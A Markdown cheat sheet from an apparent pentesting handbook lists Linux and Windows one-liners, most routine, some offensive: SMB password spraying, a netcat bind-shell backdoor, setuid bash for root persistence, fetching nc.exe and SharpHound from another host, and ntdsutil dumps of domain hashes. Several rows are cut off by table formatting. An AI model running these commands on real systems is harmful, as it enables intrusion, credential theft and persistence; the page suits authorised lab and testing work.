handbook/tools/0.Bookmark/One-Liners.md
2024-08-31 01:07:22 +02:00

66 lines
22 KiB
Markdown

# Linux
| Command | Purpose | | |
| -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------- |
| `GREENIE=haha; export GREENIE` | Creates an environment variable named `GREENIE` with value `haha`, then exports it to be available to other programs | | |
| `PATH=$PATH:/root/haha` | Adds the folder `/root/haha` to the system `PATH` environment variable while retaining the previous `PATH` value | | |
| `sort | uniq -c | sort -n` | Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by the count value in ascending order |
| `cat squid_access.log | sort -k 2 | head` | Reads `squid_access.log`, sorts it based on the second column, and displays the first 10 lines of the sorted output |
| `wc -l` | Counts the number of lines in a file or from `stdin` | | |
| `wc -c` | Counts the number of bytes in a file or from `stdin` | | |
| `wc -w` | Counts the number of words in a file or from `stdin` | | |
| `awk '{print $1,$4}'` | Prints the first and fourth (non-zero indexed) characters/fields from `stdin` | | |
| `awk '{print $(NF-1)}'` | Prints the second to last column from `stdin` | | |
| `awk '{print length, $1}'` | Prints the length of each line and the contents of the first field/column from `stdin` | | |
| `awk '{ sum += $1 } END { print sum }'` | Takes the lines from a file/`stdin` and adds up the values in the first field/column, acting as a quick and dirty calculator | | |
| `cat peptides.txt | while read line; do echo $line; done` | Reads in each line from `peptides.txt`, then performs `echo` for each line | |
| `cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done` | Reads in each line from `users.txt`, then performs a password spraying attack on `10.10.10.172` using `smbmap` | |
| `for i in {1..5}; do echo $i; done` | Loops from 1 to 5 and displays the value of `i` for each iteration | | |
| `for i in {000..999}; do echo KEY-HAHA-$i; done` | Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999` and displays each value | | |
| `TF=$(mktemp -d)` | Creates a temporary directory and assigns its path to an environment variable named `TF` | | |
| `${#TF}` | Outputs the length of the value stored in the environment variable `TF` | | |
| `sed 's/12/13/g'` | Replaces all instances of `12` with `13` in stdin, will replace `1234` with `1334` | | |
| `sed -i.bak '/line to delete/d' | ` | Deletes a line of text for all files in a directory | |
| `xxd -p` | Prints the hex of stdin or a file only, without hexdump format | | |
| `xxd -r` | Interprets raw hex from stdin, can redirect to save the hex to a file | | |
| `tr -d '\r' | tr -d '\n' | xxd -r -p` | Takes hex input, removes newlines, and places it into a file |
| `find / -user Matt 2>/dev/null` | Finds all files owned by `Matt` on the box, redirects `stderr` to null | | |
| `find /etc -type f --name apache2. | ` | Finds any file which begins with `apache2. | ` in `/etc` |
| `grep -E "(25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\.(25[0-5] | 2[0-4][0-9] |
| `curl -d "param1=value&param2=value" https://example.com/resource.cgi` | Sends parameters with `curl` | | |
| `date -d @1286536308` | Converts an epoch timestamp to `date` output | | |
| `mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe` | Creates a netcat backdoor without `-e` support | |
| `tar -zcvf files.tar.gz /var/log/apache2` | Creates a `files.tar.gz` archive of all files in `/var/log/apache2` | | |
| `prips 10.10.10.0/24` | Prints all IPs in a specific subnet | | |
| `ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255` | Assigns an IP address from the terminal | | |
| `ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up` | Changes the MAC address for interface `eth0` | | |
| `dhclient eth0` | Requests a DHCP address on interface `eth0` | | |
| `dd if=./input.file of=./outfile` | Makes a bit-by-bit copy of a file or system | | |
| `sudo ln -s /usr/bin/python3 /usr/bin/python` | Creates a symbolic link for Python to run Python 3 | | |
| `sudo mkdir /mnt/new` | Creates a new directory `/mnt/new` with `sudo` permissions | | |
| `mount /dev/sbd1 /mnt/new` | Mounts the file system located at `/dev/sbd1` to the directory `/mnt/new` | | |
| `umount /dev/sdb1` | Unmounts the file system located at `/dev/sdb1` | | |
| `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1` | Adds another default route with a higher metric to choose a different interface to access the Internet | | |
| `sudo dhclient wlan0` | Requests a new DHCP lease on interface `wlan0` | | |
| `openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc` | Encrypts a file with a password at the command line | | |
| `openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt` | Decrypts a file using a password at the command line | | |
| `sudo chmod +s /bin/bash`<br>`bash -p` | Execute the command in a machine, and if root access is lost, use "bash -p" for a root shell. | | |
---
# Windows
| Command | Purpose |
| ------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- |
| `get-childitem -hidden` | Shows all hidden files in the current directory |
| `gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null` |
| `1..255 | % {ping -n1 192.168.0.$_ |
| `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location |
| `certutil -hashfile ntds.dit md5` | Hashes a file using MD5 |
| `certutil -encodehex ntds.dit ntds.hex` | Encodes a file as hexadecimal |
| `certutil -encode test.jpg test.base64` | Encodes a file as base64 |
| `certutil -decode test.base64 test.jpg` | Decodes a base64-encoded file |
| `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Downloads a file from another machine |
| `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Monitors the clipboard and prints its contents to the screen |
| `ntdsutil; activate instance ntds; ifm; create full C:\ntds; quit; quit;` | Uses `ntdsutil` to obtain the `SYSTEM` registry and hive data as a backup, containing user hashes to crack |